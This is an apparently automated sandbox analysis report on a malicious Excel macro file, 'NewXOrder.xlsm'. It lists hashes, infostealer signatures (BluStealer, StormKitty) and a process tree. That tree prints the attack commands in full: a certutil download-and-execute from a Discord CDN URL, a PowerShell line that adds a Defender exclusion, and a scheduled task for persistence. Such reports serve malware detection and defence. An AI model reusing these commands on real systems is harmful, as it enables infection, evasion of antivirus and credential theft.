Analysis

  • max time kernel
    150s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-08-2022 06:51

General

  • Target

    NewXOrder.xlsm

  • Size

    42KB

  • MD5

    1f972129c268128a9e63b03f166cd65a

  • SHA1

    e19b5eed24f6d881338793e9f7218ff99c1d7981

  • SHA256

    b80d30b287b4ba5c153bac042a1a9eec6d746181b893717cbcb05ed3180d8d71

  • SHA512

    421fc17d3bb396d84907190a46df51851ddfafc7549e15f728f4a549d27f9fe2ab2723e0126599f260c58a3e165a5e128cc677a0cdeb7839e3e7e39ac6a0d90b

Malware Config

Signatures

  • BluStealer

    A Modular information stealer written in Visual Basic.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\NewXOrder.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4584
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c certutil.exe -urlcache -split -f "https://cdn.discordapp.com/attachments/1006822561709047861/1008583809245126708/New_Order.exe" Dqfmwyjfhy.exe.exe && Dqfmwyjfhy.exe.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2568
      • C:\Windows\system32\certutil.exe
        certutil.exe -urlcache -split -f "https://cdn.discordapp.com/attachments/1006822561709047861/1008583809245126708/New_Order.exe" Dqfmwyjfhy.exe.exe
        3⤵
          PID:724
        • C:\Users\Admin\Documents\Dqfmwyjfhy.exe.exe
          Dqfmwyjfhy.exe.exe
          3⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:4696
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\RAUXoDciVwKR.exe"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1344
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAUXoDciVwKR" /XML "C:\Users\Admin\AppData\Local\Temp\tmpAE8.tmp"
            4⤵
            • Creates scheduled task(s)
            PID:4556
          • C:\Users\Admin\Documents\Dqfmwyjfhy.exe.exe
            "C:\Users\Admin\Documents\Dqfmwyjfhy.exe.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3096
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              5⤵
              • Accesses Microsoft Outlook profiles
              • Checks processor information in registry
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:2040

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\tmpAE8.tmp

      Filesize

      1KB

      MD5

      f4771cbe522ae5adc92b247eb709341c

      SHA1

      cbf2573923e960d6431e84ca392917aa352c8f26

      SHA256

      f14ec2ff2b41ada3fdf1afcd3babd672d310e86c484619dc60d35eeb59e49c3a

      SHA512

      307a71f810707a4eb99614bed9e3577f8cc700905c1956fea12acf8a82f7c9176098e0e71802826c8b44dfbd0f533aa22d55d58be412fee7a83f76e77b88abfe

    • C:\Users\Admin\Documents\Dqfmwyjfhy.exe.exe

      Filesize

      847KB

      MD5

      200bbb757192fb530d38711a112338ba

      SHA1

      259c77525cf161a376a07ed9a035c3064e2a1f17

      SHA256

      dfdea8e5cc329e17847e129d8e515043b0dba31f1af48304f28dd181483607ae

      SHA512

      b387ea9263598db899501f202f754e0bbc39b72be177857809a70fc4608310b46e00fe9d96e9cc00d2a2c9ce48bec764f0f4aaa989724d0079711b8cd37866ea

    • C:\Users\Admin\Documents\Dqfmwyjfhy.exe.exe

      Filesize

      847KB

      MD5

      200bbb757192fb530d38711a112338ba

      SHA1

      259c77525cf161a376a07ed9a035c3064e2a1f17

      SHA256

      dfdea8e5cc329e17847e129d8e515043b0dba31f1af48304f28dd181483607ae

      SHA512

      b387ea9263598db899501f202f754e0bbc39b72be177857809a70fc4608310b46e00fe9d96e9cc00d2a2c9ce48bec764f0f4aaa989724d0079711b8cd37866ea

    • C:\Users\Admin\Documents\Dqfmwyjfhy.exe.exe

      Filesize

      847KB

      MD5

      200bbb757192fb530d38711a112338ba

      SHA1

      259c77525cf161a376a07ed9a035c3064e2a1f17

      SHA256

      dfdea8e5cc329e17847e129d8e515043b0dba31f1af48304f28dd181483607ae

      SHA512

      b387ea9263598db899501f202f754e0bbc39b72be177857809a70fc4608310b46e00fe9d96e9cc00d2a2c9ce48bec764f0f4aaa989724d0079711b8cd37866ea

    • memory/1344-178-0x0000000007BB0000-0x0000000007BBA000-memory.dmp

      Filesize

      40KB

    • memory/1344-170-0x0000000006820000-0x000000000683E000-memory.dmp

      Filesize

      120KB

    • memory/1344-176-0x0000000008180000-0x00000000087FA000-memory.dmp

      Filesize

      6.5MB

    • memory/1344-156-0x0000000002F10000-0x0000000002F46000-memory.dmp

      Filesize

      216KB

    • memory/1344-175-0x00000000079A0000-0x00000000079BE000-memory.dmp

      Filesize

      120KB

    • memory/1344-179-0x0000000007DB0000-0x0000000007E46000-memory.dmp

      Filesize

      600KB

    • memory/1344-180-0x0000000007D60000-0x0000000007D6E000-memory.dmp

      Filesize

      56KB

    • memory/1344-174-0x00000000711A0000-0x00000000711EC000-memory.dmp

      Filesize

      304KB

    • memory/1344-173-0x00000000079C0000-0x00000000079F2000-memory.dmp

      Filesize

      200KB

    • memory/1344-177-0x0000000007B30000-0x0000000007B4A000-memory.dmp

      Filesize

      104KB

    • memory/1344-168-0x00000000061F0000-0x0000000006256000-memory.dmp

      Filesize

      408KB

    • memory/1344-167-0x0000000006180000-0x00000000061E6000-memory.dmp

      Filesize

      408KB

    • memory/1344-166-0x0000000005A60000-0x0000000005A82000-memory.dmp

      Filesize

      136KB

    • memory/1344-181-0x0000000007E70000-0x0000000007E8A000-memory.dmp

      Filesize

      104KB

    • memory/1344-159-0x0000000005AE0000-0x0000000006108000-memory.dmp

      Filesize

      6.2MB

    • memory/1344-182-0x0000000007E50000-0x0000000007E58000-memory.dmp

      Filesize

      32KB

    • memory/2040-172-0x0000000000740000-0x000000000075A000-memory.dmp

      Filesize

      104KB

    • memory/3096-163-0x0000000000400000-0x0000000000425000-memory.dmp

      Filesize

      148KB

    • memory/3096-169-0x0000000000400000-0x0000000000425000-memory.dmp

      Filesize

      148KB

    • memory/3096-160-0x0000000000400000-0x0000000000425000-memory.dmp

      Filesize

      148KB

    • memory/3096-183-0x0000000000400000-0x0000000000425000-memory.dmp

      Filesize

      148KB

    • memory/4584-138-0x00007FFEC40F0000-0x00007FFEC4100000-memory.dmp

      Filesize

      64KB

    • memory/4584-153-0x00007FFEC6450000-0x00007FFEC6460000-memory.dmp

      Filesize

      64KB

    • memory/4584-132-0x00007FFEC6450000-0x00007FFEC6460000-memory.dmp

      Filesize

      64KB

    • memory/4584-134-0x00007FFEC6450000-0x00007FFEC6460000-memory.dmp

      Filesize

      64KB

    • memory/4584-151-0x00007FFEC6450000-0x00007FFEC6460000-memory.dmp

      Filesize

      64KB

    • memory/4584-150-0x00007FFEC6450000-0x00007FFEC6460000-memory.dmp

      Filesize

      64KB

    • memory/4584-133-0x00007FFEC6450000-0x00007FFEC6460000-memory.dmp

      Filesize

      64KB

    • memory/4584-135-0x00007FFEC6450000-0x00007FFEC6460000-memory.dmp

      Filesize

      64KB

    • memory/4584-136-0x00007FFEC6450000-0x00007FFEC6460000-memory.dmp

      Filesize

      64KB

    • memory/4584-137-0x00007FFEC40F0000-0x00007FFEC4100000-memory.dmp

      Filesize

      64KB

    • memory/4584-152-0x00007FFEC6450000-0x00007FFEC6460000-memory.dmp

      Filesize

      64KB

    • memory/4696-147-0x00000000056D0000-0x00000000056DA000-memory.dmp

      Filesize

      40KB

    • memory/4696-144-0x0000000000C40000-0x0000000000D18000-memory.dmp

      Filesize

      864KB

    • memory/4696-146-0x0000000005720000-0x00000000057B2000-memory.dmp

      Filesize

      584KB

    • memory/4696-145-0x0000000005C30000-0x00000000061D4000-memory.dmp

      Filesize

      5.6MB

    • memory/4696-148-0x0000000007980000-0x0000000007A1C000-memory.dmp

      Filesize

      624KB